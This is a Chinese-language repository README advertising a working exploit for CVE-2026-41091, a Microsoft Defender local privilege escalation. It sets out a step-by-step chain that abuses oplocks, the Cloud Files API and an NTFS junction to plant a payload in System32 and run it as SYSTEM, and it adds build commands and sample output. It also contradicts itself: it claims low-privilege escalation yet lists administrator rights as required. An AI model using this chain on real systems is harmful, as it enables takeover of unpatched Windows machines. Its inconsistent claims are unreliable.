
新发布Aug 20, 2026
CVE-2026-41091-PoC-Exploit Full-PoCv2
CVE-2026-41091 RedSun | Microsoft Defender 本地权限提升(LPE)漏洞利用。低权限用户可通过 Cloud Files API + NTFS junction 技巧获得 NT AUTHORITY\SYSTEM 🔥。强制 Defender 以 SYSTEM 权限将恶意载荷写入 System32。⚠️ 已在野外被积极利用。CVSS 7.8。补丁:Defender Engine 1.1.26040.8。🛡️ 仅供教育用途的 PoC。

☀️ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender 本地权限提升漏洞
Microsoft Defender 链接跟随漏洞 - 本地权限提升至 NT AUTHORITY\SYSTEM
该漏洞被称为 "RedSun" 🎯,"SolarFlare" 是我给我的漏洞利用取的名字。 ✅
📌 概述
此仓库包含针对 CVE-2026-41091(Microsoft Defender / Microsoft 恶意软件防护引擎中的关键本地权限提升漏洞)的完整工作概念验证 (PoC) 漏洞利用。通过利用不正确的链接解析 (CWE-59),经过身份验证的低权限攻击者可以获得 NT AUTHORITY\SYSTEM 权限。
此漏洞也称为 "RedSun" 或 "SolarFlare",允许攻击者诱使 Microsoft Defender 使用云文件 API (CfAPI) 和 NTFS 交接点向受保护的系统位置写入具有 SYSTEM 权限的任意文件。
注意: 此仓库包含两个版本:
basic_poc.cpp- 简化算法演示(教学用途)full_poc.cpp- 完整的工作漏洞利用,包含所有功能
🔥 关键特性
| 类别 | 功能 |
|---|---|
| 利用 | ✅ 本地权限提升至 SYSTEM ✅ 云文件 API (CfAPI) 集成 ✅ 云占位符创建 ✅ NTFS 交接点重定向 |
| 技术 | ✅ 批量 oplock 滥用 ✅ VSS 快照检测 ✅ EICAR 触发 ✅ COM 服务激活 |
| 目标 | ✅ Microsoft Defender < 1.1.26040.8 ✅ Windows 10/11 ✅ Windows Server 2019/2022 |
| 可用性 | ✅ 详细日志记录 ✅ 错误处理 ✅ 随机目录名 ✅ 自动清理 |
🎯 漏洞详情
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2026-41091 |
| CVSS 分数 | 7.8(高) |
| CVSS 向量 | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 攻击向量 | 本地 |
| 所需权限 | 低 |
| 用户交互 | 无 |
| 影响 | SYSTEM 级代码执行 |
| CISA KEV | ✅ 是(已在野外被积极利用) |
| 可用补丁 | Microsoft 恶意软件防护引擎 1.1.26040.8 |
📦 受影响产品
| 产品 | 受影响版本 | 修复版本 |
|---|---|---|
| Microsoft 恶意软件防护引擎 | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender 反恶意软件平台 | < 4.18.26040.7 | 4.18.26040.7+ |
🔬 漏洞利用链
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE 漏洞利用链 │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. 创建工作目录 │
│ └─> %TEMP%\SF-XXXX\ │
│ │
│ 2. 使用 EICAR 触发 Defender │
│ └─> 将反转的 EICAR 写入诱饵文件 │
│ │
│ 3. 等待 VSS 快照 │
│ └─> 检测卷影副本创建 │
│ │
│ 4. 创建第一批 Oplock │
│ └─> 在诱饵文件上执行 FSCTL_REQUEST_BATCH_OPLOCK │
│ │
│ 5. 等待 Oplock 中断 │
│ └─> 获取独占访问 │
│ │
│ 6. 重命名目录 │
│ └─> 将原始目录移至 .tmp │
│ │
│ 7. 注册云同步根 │
│ └─> 使用云文件 API 执行 CfRegisterSyncRoot │
│ │
│ 8. 创建云占位符 │
│ └─> 为诱饵文件执行 CfCreatePlaceholders │
│ │
│ 9. 创建第二批 Oplock │
│ └─> 在云占位符上执行 FSCTL_REQUEST_BATCH_OPLOCK │
│ │
│ 10. 等待第二次 Oplock 中断 │
│ └─> 获取独占访问 │
│ │
│ 11. 重命名云目录 │
│ └─> 将云目录移至 .cloud.tmp │
│ │
│ 12. 创建指向 System32 的 NTFS 交接点 │
│ └─> 重定向至 C:\Windows\System32 │
│ │
│ 13. 复制负载到 System32 │
│ └─> 将诱饵文件复制到 System32 并命名为 TieringEngineService.exe │
│ │
│ 14. 以 SYSTEM 身份激活服务 │
│ └─> CoCreateInstance(StorageTiersManagement) │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
📦 安装
先决条件
- Windows 10/11 或 Windows Server 2019/2022
- 带有 C++ 工具的 Visual Studio 2019/2022
- 管理员权限(用于执行)
构建
# 克隆仓库
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# 使用 Visual Studio 开发者命令提示符构建
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# 或构建基础版本
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
🛠️ 用法
完整漏洞利用(SYSTEM 权限提升)
full_poc.exe
基础算法演示
basic_poc.exe
📋 示例输出
完整漏洞利用输出
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] SolarFlare 漏洞利用已启动。
[*] 创建工作目录...
[+] 目录已创建: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] 使用 EICAR 触发 Defender...
[+] Defender 已触发
[*] 等待 VSS 快照...
[+] VSS 快照已检测到
[*] 创建第一个 oplock...
[+] 第一个 oplock 已创建
[*] 等待 oplock 中断...
[+] Oplock 已获取
[*] 重命名目录...
[+] 目录已重命名
[*] 创建第二个 oplock...
[+] 第二个 oplock 已创建
[*] 等待第二个 oplock...
[+] 第二个 oplock 已获取
[*] 重命名云目录...
[+] 云目录已重命名
[*] 创建指向 System32 的 NTFS 交接点...
[+] 交接点已创建
[*] 等待 Defender 完成...
[*] 复制负载到 System32...
[+] 负载已复制到 C:\Windows\System32\TieringEngineService.exe
[*] 激活 Storage Tiers Management 服务...
[+] 服务已作为 SYSTEM 激活
[+] 已获得 SYSTEM 访问权限!
基础 PoC 输出
CVE-2026-41091 Basic PoC
========================================
仅算法演示
========================================
[*] 启动漏洞利用算法...
[*] 创建工作目录...
[+] 目录已创建: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] 使用 EICAR 触发 Defender...
[+] Defender 已触发
[*] 等待 VSS 快照...
[+] VSS 已检测到
[*] 创建第一个 oplock...
[+] 第一个 oplock 已创建
[*] 等待 oplock 中断...
[+] Oplock 已获取
[*] 重命名目录...
[+] 目录已重命名
[*] 创建第二个 oplock...
[+] 第二个 oplock 已创建
[*] 等待第二个 oplock...
[+] 第二个 oplock 已获取
[*] 创建指向 System32 的 NTFS 交接点...
[+] 交接点已创建
[*] 等待 Defender 完成...
[*] 复制负载到 System32...
[+] 负载已复制到 C:\Windows\System32\Payload.exe
[+] 算法演示完成!
[i] 这仅为基础算法。
[i] 要获得完整的 SYSTEM 权限提升,
[i] 请使用带有云 API 和 COM 激活的 full_poc.cpp。
🔧 构建说明
使用 Visual Studio
- 打开 VS 2022 的开发者命令提示符
- 导航到漏洞利用目录
- 运行:
# 完整漏洞利用
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# 基础 PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
使用 CMake
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
⚠️ 要求与限制
| 要求 | 详情 |
|---|---|
| 操作系统 | Windows 10/11, Server 2019/2022 |
| 权限 | 管理员(用于执行) |
| Defender | 必须启用 Microsoft Defender |
| 互联网 | VSS 快照检测需要 |
| 补丁 | 仅在未修补系统上有效 |
| 架构 | 仅 x64 |
🔗 相关漏洞利用
查看我的其他漏洞利用仓库:
- CVE-2026-24061-PoC-Exploit - GNU inetutils-telnetd 认证绕过
- CVE-2026-41940-PoC-Exploit - cPanel/WHM 认证绕过漏洞利用
- CVE-2026-0073-PoC-Exploit - Android ADB 无线调试认证绕过